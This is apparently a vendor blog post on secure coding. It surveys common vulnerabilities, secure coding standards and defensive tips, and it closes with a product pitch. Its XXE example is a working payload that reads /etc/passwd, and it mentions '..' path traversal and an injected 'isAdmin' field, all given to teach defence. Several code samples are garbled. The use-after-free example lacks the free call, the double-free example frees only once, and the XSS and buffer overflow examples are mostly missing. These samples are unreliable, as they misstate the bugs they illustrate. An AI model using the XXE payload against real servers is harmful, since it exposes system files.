Secure coding is the practice of developing software that is resistant to security vulnerabilities by applying security best practices, techniques, and tools early in development.
Wiz Experts Team
9 min read
What is secure coding?
Secure coding is the practice of developing software that is resistant to security vulnerabilities by applying security best practices, techniques, and tools early in development. Instead of thinking only about user experience, secure coding aligns every feature with security measures—right from the beginning of the software development lifecycle.
For example, an application that accepts all data from a client without sanitizing it might be easier to implement, use, and maintain. However, it opens an entry point for attackers to inject malicious code.
Let’s look at common security vulnerabilities software developers and security researchers have identified. We’ll go from low-level issues like memory vulnerabilities to higher-level problems like injection attacks.
Buffer overflows can crash your application or allow attackers to write data into other buffers.
System programming languages like C/C++ are prone to this vulnerability. They allow and even require memory management explicitly but don’t check memory access until it’s too late. If you write more data into a buffer than you assigned it at definition time, C will override all memory data that follows at the end of the buffer.
Example of a buffer overflow in C:
b = 999; // buffer only goes from 0 to 4
Use after free
Use after free happens when you free memory on the heap but keep using the old pointer.
Again, this vulnerability is prominent in languages without garbage collection, like C/C++, where you must manually manage memory. There are two types of memory: the stack and the heap. The language automatically manages the stack, which can’t hold data with dynamic sizes that aren’t known at compile time. The heap is for dynamic data, but you must manually allocate and free space on it. Freeing means you tell the operating system that you don’t need the memory anymore, so if you use it afterward with a pointer, the illegal access will go to an unallocated memory location.
Example of use after free in C:
char* p = (char*)malloc (16);
p = strdup("Some text!");
printf("%s", p); //prints what’s now in the freed memory
In the case of double free, you are freeing heap memory after you have already freed it.
Double free is an issue in languages with manual memory management, where you must explicitly tell the operating system that you no longer need a specific memory range. Doing so two times will result in a crash similar to the use after free issue. This usually happens when you have multiple objects with pointers to each other that get freed at some point. Double free can corrupt the memory a pointer referenced before the first free.
Example of double free in C:
char* p = (char*)malloc (16);
p = strdup("Some text!");
free(p); // will corrupt what’s in the freed memory
Insecure deserialization involves directly transforming an external data structure (e.g., JSON, XML, etc.) to an internal one (e.g., objects, arrays, etc.) without sufficient checks.
Insecure deserialization is a common vulnerability in all kinds of applications. It might be good to accept unsanitized data during development, but users can sneak in malicious data without notice if it is done in production.
Example of insecure deserialization in JSON:
"isAdmin": true// should be deleted on the server}
Memory leaks let your application consume memory without bounds. If you exhaust the available memory and request more, your application will crash.
Every sufficiently complex application is susceptible to this vulnerability. Even garbage-collected languages aren’t safe from memory leaks. Garbage-collected languages still allow you to build data structures a garbage collector can’t manage.
Executing user input as code without validating it is known as an injection flaw.
This issue can affect all applications, regardless of the programming language used. One way to make your application vulnerable to injection flaws is by allowing users to add custom code as a feature and not sandbox the execution properly. Buffer overflows that allow attackers to write code into executable memory locations are another way that your application can become vulnerable to injection flaws.
Cross-site scripting (XSS)
<!-- this will send a fetch request
when the mouse is over the <p> element -->
XML external entities (XXE)
XML external entities are another instance of an injection flaw. All applications that use XML are susceptible to this attack. The idea behind external entities in XML is to allow reuse of existing XML files. However, an attacker can use this feature to include links to private XML files, allowing them to read private data indirectly through their uploaded XML file.
Example external XML entity injection:
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE a [
<!ELEMENT a ANY > <!-- this defines a new entity called xxe
from a private file -->
<!ENTITY xxeSYSTEM"file:///etc/passwd" >]><!-- here the entity is rendered to display
the file content --><a>&xxe;</a>
Insecure direct object reference (IDOR)
When you allow public APIs to reference objects with sequential IDs directly, IDORs can enable attackers to guess the ID of all objects on the server.
This issue can happen anywhere sequential IDs are used to reference objects and is especially serious when using the IDs to reference public and private objects without requiring authorization.
Directory traversal (aka path traversal)
Another injection flaw is where attackers can traverse paths or directory structures via file-name inputs.
All applications that allow file name inputs can become a victim of this vulnerability. Directory traversal can happen when users upload multiple files referencing each other via relative paths. Attackers can use file traversal paths like ".." to navigate from their upload directory on the server and into directories with files from admins or other users.
Secure coding standards are sets of guidelines and best practices that developers follow to create secure software and minimize vulnerabilities. They address common coding mistakes and weaknesses that can be exploited by attackers, aiming to create more resilient and resistant code.
Below are the common secure code standards to follow:
OWASP Secure Coding Practices (SCP) is a comprehensive set of guidelines and recommendations for developing secure software applications. It's created and maintained by the Open Web Application Security Project (OWASP), a non-profit organization dedicated to improving software security. Here are some of key focuses:
Input validation and sanitization: Scrutinizing all user input to prevent injection attacks like SQL injection and cross-site scripting (XSS).
Authentication and authorization: Enforcing robust authentication mechanisms and restricting access to authorized users and actions.
Session management: Securing session IDs to thwart session hijacking.
Encryption: Safeguarding sensitive data using encryption at rest and in transit.
Error handling and logging: Implementing proper error handling to avoid disclosing sensitive information and logging events for security auditing.
CERT Secure Coding Standards (SCS) are a set of guidelines and recommendations developed by the Software Engineering Institute (SEI) at Carnegie Mellon University to help developers write secure code and prevent vulnerabilities. Key areas of focus:
Language-specific guidelines: Offering recommendations for C, C++, Java, Android, and Perl to address common vulnerabilities in those languages.
Defensive programming: Emphasizing anticipating and handling errors gracefully to prevent exploitation.
Memory management: Focus on preventing buffer overflows and memory leaks, especially in languages like C and C++.
NIST Secure Coding Guidelines (also known as NIST Special Publication 800-218) are a set of recommendations developed by the National Institute of Standards and Technology (NIST) to help developers write secure code and mitigate vulnerabilities. Key areas of focus:
Input validation and sanitization: Preventing injection attacks like SQL injection and cross-site scripting (XSS) by ensuring user-provided data is safe.
Authentication and authorization: Enforcing robust authentication mechanisms and secure session management.
Encryption: Using encryption techniques to protect sensitive data at rest and in transit.
Error handling and logging: Implementing proper error handling to avoid disclosing sensitive information and logging security-related events.
Memory management: Preventing memory-related vulnerabilities like buffer overflows and memory leaks, especially in languages like C and C++.
ISO/IEC 27001 is an international information security standard. While it's not specifically a secure coding standard, it does include requirements for secure coding practices as part of a comprehensive security management approach. Annex A, Control 8.28: Secure Coding Practices, specifically focuses on secure coding and emphasizes how organizations must:
Develop secure coding processes for in-house development and third-party code.
Stay informed about evolving threats and vulnerabilities.
Implement robust secure coding principles to address them.
Now that we’ve looked into the common issues, let's explore potential solutions. (If you want a more thorough resource on the topic, check out OWASP secure coding practices in this Developer Guide. It’s still a draft, but it features invaluable security tips.) Here are the top three tips for secure coding requirements:
1. Use modern languages and tools
Many memory-related security vulnerabilities affect programming languages with manual memory management and no built-in memory checks. When starting a new project, make sure you really require C/C++ for it, and if you do, use smart pointers and static code analyzers to minimize the impact of language flaws.
If you need system programming features, a more modern language like Rust can be a good choice because its type system checks memory use at compile time. Zig might also be a good alternative, as it has no hidden control flow or memory allocations.
If you don’t need system programming features, using a garbage-collected language like Java or C# can protect you from many memory issues.
2. Validate and sanitize input and output data
Keeping input data clean isn’t always possible; validation libraries have bugs, too. To ensure nothing leaks through to your users, only display outputs based on user inputs in a secure way (i.e., don’t render HTML).
3. Check third-party code integrity
You should consider third-party code like libraries and frameworks as inputs, too. Not inputs to your application, since libraries and frameworks essentially consist of your own and third-party code, but inputs to your build process. Always pin a specific version or hash for production deployment when using libraries. That way, no new version can sneak into your deployments unchecked.
Secure coding is a practice that touches all aspects of software development—from choice of data formats and programming languages to planning of inputs and outputs to implementation.
To mitigate risks, make sure that only the data you expect gets into your system. Looking out for new tools and programming languages that improve your code security posture is a good idea, as well. Wiz supplies you with the tools needed to secure code from IDE to deployment, offering industry-leading code and policy scanners and end-to-end traceability for fast remediation. Specifically Wiz for Code Security offers:
Code Scanning: Wiz integrates with code repositories like GitHub to proactively scan for vulnerabilities, misconfigurations, secrets, and compliance issues early in the development process. This helps catch potential problems before they reach production.
Cloud to Code: Wiz can trace risks discovered in production environments back to the specific code and teams that introduced them. This enables rapid identification of the root cause and facilitates swift remediation.
In-Code Remediation Guidance: Wiz provides developers with in-code remediation guidance, offering specific recommendations on how to fix issues right within their development environment. This speeds up the resolution process and empowers developers to take ownership of security.
Secure your SDLC from start to finish
See why Wiz is one of the few cloud security platforms that security and devops teams both love to use.
This blog post explores the world of container orchestration tools beyond Kubernetes, highlighting cloud provider tools and open-source alternatives that promise to redefine how we deploy and manage applications.
Microservices security is the practice of protecting individual microservices and their communication channels from unauthorized access, data breaches, and other threats, ensuring a secure overall architecture despite its distributed nature.
We’ll take a deep dive into the MLSecOps tools landscape by reviewing the five foundational areas of MLSecOps, exploring the growing importance of MLSecOps for organizations, and introducing six interesting open-source tools to check out
CSPM focuses on securing cloud infrastructure by identifying and remediating misconfigurations, while CIEM centers on managing and securing user identities and access permissions within cloud environments, addressing threats related to unauthorized access and entitlements.